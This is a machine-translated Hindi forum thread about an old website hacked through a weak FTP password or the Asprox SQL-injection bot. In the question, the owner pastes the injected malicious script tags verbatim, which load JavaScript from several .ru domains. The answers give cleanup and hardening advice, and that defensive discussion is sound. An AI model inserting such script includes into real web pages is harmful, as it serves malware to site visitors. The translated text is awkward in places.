मेरी वेबसाइट हैक हो गई .. मुझे क्या करना चाहिए?

मेरे पिता ने आज मुझे बुलाया और कहा कि लोग अपनी वेबसाइट पर जा रहे थे 168 वायरस अपने कंप्यूटर पर डाउनलोड करने की कोशिश कर रहे थे। वह बिल्कुल तकनीकी नहीं है, और पूरी चीज को WYSIWYG संपादक के साथ बनाया है।

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

तो मैंने अभी इसके लिए टिप्पणी की। यह पता चला कि उसका एफ़टीपी पासवर्ड एक सादा शब्दकोष शब्द छह अक्षरों का लंबा था, इसलिए हमें लगता है कि यह हैक कैसे हुआ। हमने अपना पासवर्ड 8+ अंकों के गैर-शब्द स्ट्रिंग में बदल दिया है (वह एक पासफ्रेज़ के लिए नहीं जायेगा क्योंकि वह एक शिकार-एन-पेक टाइपर है)।

मैंने एक जोइस 98hs.ru पर किया था और पाया कि यह चिली में एक सर्वर से होस्ट किया गया है। वास्तव में इसके साथ एक ई-मेल पता भी जुड़ा हुआ है, लेकिन मुझे गंभीरता से संदेह है कि यह व्यक्ति अपराधी है। शायद कुछ अन्य साइट जो हैक हो गई ...

मुझे नहीं पता कि इस बिंदु पर क्या करना है, हालांकि मैंने पहले कभी इस तरह की चीज़ से निपटाया नहीं है। किसी के पास कोई सुझाव है?

वह webhost4life.com के माध्यम से सादा जेन अन-सुरक्षित एफटीपी का उपयोग कर रहा था। मुझे अपनी साइट पर do sftp का कोई तरीका भी दिखाई नहीं देता है। मैं सोच रहा हूं कि उसका उपयोगकर्ता नाम और पासवर्ड अवरुद्ध हो गया है?

तो, समुदाय को यह अधिक प्रासंगिक बनाने के लिए, अपनी वेबसाइट को हैक करने से बचाने के लिए आपको कौन से कदम उठाने चाहिए / सर्वोत्तम अभ्यासों का पालन करना चाहिए?

रिकॉर्ड के लिए, यहां कोड की रेखा है जो "जादुई रूप से" अपनी फ़ाइल में जोड़ दी गई है (और अपने कंप्यूटर पर उसकी फाइल में नहीं है - मैंने इसे पूरी तरह से सुनिश्चित करने के लिए टिप्पणी की है कि यह कुछ भी नहीं करेगा इस पृष्ठ पर, हालांकि मुझे यकीन है कि जेफ इसके खिलाफ सुरक्षा करेगा):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js>
0
जोड़ा संपादित
विचारों: 2
बस fwiw, webhost4life पोर्ट 2222 पर sftp है।
जोड़ा लेखक ruffin, स्रोत

8 उत्तर

मुझे पता है कि यह खेल में थोड़ा देर हो चुकी है, लेकिन जावास्क्रिप्ट के लिए उल्लिखित यूआरएल का उल्लेख जून में शुरू होने वाले एएसपीआरओक्स बॉट पुनरुत्थान का हिस्सा रहा है (कम से कम उस समय जब हम झंडा लगा रहे थे यह)। इसके बारे में कुछ विवरण नीचे उल्लिखित हैं:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

इसके बारे में बुरा बात यह है कि डेटाबेस में प्रभावी रूप से प्रत्येक वर्चर्स प्रकार फ़ील्ड इस यूआरएल के संदर्भ को थूकने के लिए "संक्रमित" है, जिसमें ब्राउज़र को एक छोटा आइफ्रेम मिलता है जो इसे बॉट में बदल देता है। इसके लिए एक बुनियादी एसक्यूएल फिक्स यहां पाया जा सकता है:

http://aspadvice.com/blogs/programming_shorts/ संग्रह / 2008/06/27 / Asprox-Recovery.aspx

डरावनी चीज यह है कि वायरस सिस्टम को तालिकाओं को संक्रमित करने के लिए सिस्टम टेबल को देखता है और बहुत सी साझा होस्टिंग योजनाएं भी अपने ग्राहकों के लिए डेटाबेस स्थान साझा करती हैं। तो सबसे अधिक संभावना है कि यह आपके पिता की साइट भी संक्रमित नहीं थी, लेकिन किसी और की साइट अपने होस्टिंग क्लस्टर के भीतर थी जिसने कुछ खराब कोड लिखा और एसक्यूएल इंजेक्शन हमले के लिए दरवाजा खोला।

अगर उसने अभी तक ऐसा नहीं किया है, तो मैं अपने मेजबान को एक अजीब ई-मेल भेजूंगा और उन्हें पूरे सिस्टम को ठीक करने के लिए उस SQL ​​कोड का एक लिंक दूंगा। आप अपनी खुद की प्रभावित डेटाबेस टेबल को ठीक कर सकते हैं, लेकिन अधिकतर संभावना है कि संक्रमण करने वाले बॉट फिर से उस छेद के माध्यम से गुजरने जा रहे हैं और पूरी तरह से संक्रमित हो रहे हैं।

उम्मीद है कि यह आपको काम करने के लिए कुछ और जानकारी देता है।

संपादित करें: एक और त्वरित विचार, यदि वह अपनी वेबसाइट बनाने के लिए मेजबान ऑनलाइन डिज़ाइन टूल में से किसी एक का उपयोग कर रहा है, तो वह सारी सामग्री शायद कॉलम में बैठी है और इस तरह से संक्रमित है।

0
जोड़ा

आप उल्लेख करते हैं कि आपके पिताजी एक वेबसाइट प्रकाशन उपकरण का उपयोग कर रहे थे।

यदि प्रकाशन उपकरण अपने कंप्यूटर से सर्वर पर प्रकाशित होता है, तो यह हो सकता है कि उसकी स्थानीय फाइलें साफ़ हों, और उसे सर्वर पर पुन: प्रकाशित करने की आवश्यकता है।

उसे देखना चाहिए कि सादे एफ़टीपी की तुलना में उसके सर्वर पर एक अलग लॉगिन विधि है, हालांकि ... यह बहुत सुरक्षित नहीं है क्योंकि यह इंटरनेट पर स्पष्ट-पाठ के रूप में अपना पासवर्ड भेजता है।

0
जोड़ा

जितना संभव हो उतना जानकारी आज़माएं और इकट्ठा करें। देखें कि मेजबान आपको एक लॉग दे सकता है जो आपके खाते में किए गए सभी एफ़टीपी कनेक्शन दिखा रहा है। आप उन लोगों का उपयोग कर सकते हैं यह देखने के लिए कि क्या यह एक एफ़टीपी कनेक्शन भी था जिसका उपयोग परिवर्तन करने और संभवतः आईपी पता प्राप्त करने के लिए किया गया था।

यदि आप वर्डप्रेस, ड्रूपल या किसी अन्य चीज जैसे प्रीपेक किए गए सॉफ़्टवेयर का उपयोग कर रहे हैं, तो आपने अपलोड कोड में भेद्यताएं दी हैं जो इस प्रकार के संशोधन की अनुमति देती हैं। यदि यह कस्टम बनाया गया है, तो किसी भी स्थान को दोबारा जांचें जहां आप उपयोगकर्ताओं को फ़ाइलों को अपलोड करने या मौजूदा फ़ाइलों को संशोधित करने की अनुमति देते हैं।

दूसरी बात साइट के डंप को लेना और अन्य संशोधनों के लिए सब कुछ जांचना होगा। यह सिर्फ एक ही संशोधन हो सकता है, लेकिन अगर वे एफ़टीपी के माध्यम से आते हैं जो जानता है कि वहां और क्या है।

अपनी साइट को किसी ज्ञात अच्छी स्थिति में वापस लाएं और यदि आवश्यक हो, तो नवीनतम संस्करण में अपग्रेड करें।

रिटर्न का स्तर भी आपको ध्यान में रखना है। क्या व्यक्ति को ट्रैक करने की कोशिश करने के लायक नुकसान है या यह ऐसा कुछ है जहां आप बस रहते हैं और सीखते हैं और मजबूत पासवर्ड का उपयोग करते हैं?

0
जोड़ा

एक छः शब्द चरित्र पासवर्ड के साथ, वह बलपूर्वक मजबूर हो सकता है। यह उनके एफटीपी को अवरुद्ध होने की तुलना में अधिक संभावना है, लेकिन यह भी हो सकता है।

एक मजबूत पासवर्ड से शुरू करें। (8 वर्ण अभी भी काफी कमजोर हैं)

देखें कि इंटरनेट से यह लिंक सुरक्षा ब्लॉग उपयोगी है या नहीं।

0
जोड़ा

क्या साइट सिर्फ सादा स्थिर HTML है? यानी वह खुद को एक अपलोड पेज कोड करने में कामयाब नहीं रहा है जो किसी भी समझौता स्क्रिप्ट / पृष्ठों को अपलोड करने के लिए ड्राइविंग करने की अनुमति देता है?

Webhost4life से क्यों न पूछें यदि उनके पास कोई एफ़टीपी लॉग उपलब्ध है और उन्हें समस्या की रिपोर्ट करें। आप कभी नहीं जानते, वे काफी ग्रहणशील हो सकते हैं और आपके लिए वास्तव में क्या हुआ?

मैं एक साझा होस्टर के लिए काम करता हूं और हम हमेशा इन तरह की रिपोर्टों का स्वागत करते हैं और आमतौर पर हमले के सटीक वेक्टर को इंगित कर सकते हैं और सलाह देते हैं कि ग्राहक कहां गलत हो गया है।

0
जोड़ा

हम स्पष्ट रूप से एक ही लड़के से हैक किया गया था! या बॉट, हमारे मामले में। उन्होंने कुछ पुराने क्लासिक एएसपी साइटों पर यूआरएल में एसक्यूएल इंजेक्शन का इस्तेमाल किया जो अब कोई भी बनाए रखता है। हमने आईपी पर हमला किया और उन्हें आईआईएस में अवरुद्ध कर दिया। अब हमें सभी पुराने एएसपी रिफैक्टर करना होगा। इसलिए, मेरी सलाह है कि आईआईएस लॉग को पहले देखें, यह पता लगाने के लिए कि आपकी साइट के कोड या सर्वर कॉन्फ़िगरेशन में समस्या है या नहीं।

0
जोड़ा

शट डाउन स्क्रिप्ट से बचने के लिए इसे बंद किए बिना वेबसर्वर को अनप्लग करें। डेटा ड्राइव के रूप में किसी अन्य कंप्यूटर के माध्यम से हार्ड डिस्क का विश्लेषण करें और देखें कि क्या आप लॉग फाइलों और उस प्रकृति की चीजों के माध्यम से अपराधी को निर्धारित कर सकते हैं। सत्यापित करें कि कोड सुरक्षित है और फिर इसे बैकअप से पुनर्स्थापित करें।

0
जोड़ा

यह हाल ही में मेरे एक ग्राहक के साथ हुआ जो आईपॉवर पर होस्ट किया गया था। मुझे यकीन नहीं है कि आपका होस्टिंग वातावरण अपाचे आधारित था, लेकिन यदि यह सुनिश्चित किया गया था कि .htaccess फ़ाइलों के लिए दोबारा जांच करना सुनिश्चित किया गया है, जो विशेष रूप से वेबूट और छवि निर्देशिकाओं के अंदर नहीं हैं, क्योंकि वे वहां कुछ नस्ल को इंजेक्ट करते हैं साथ ही (वे लोगों को रीडायरेक्ट कर रहे थे कि वे कहां से आए थे)। यह भी जांचें कि आपने कोड के लिए बनाया है जिसे आपने नहीं लिखा था।

0
जोड़ा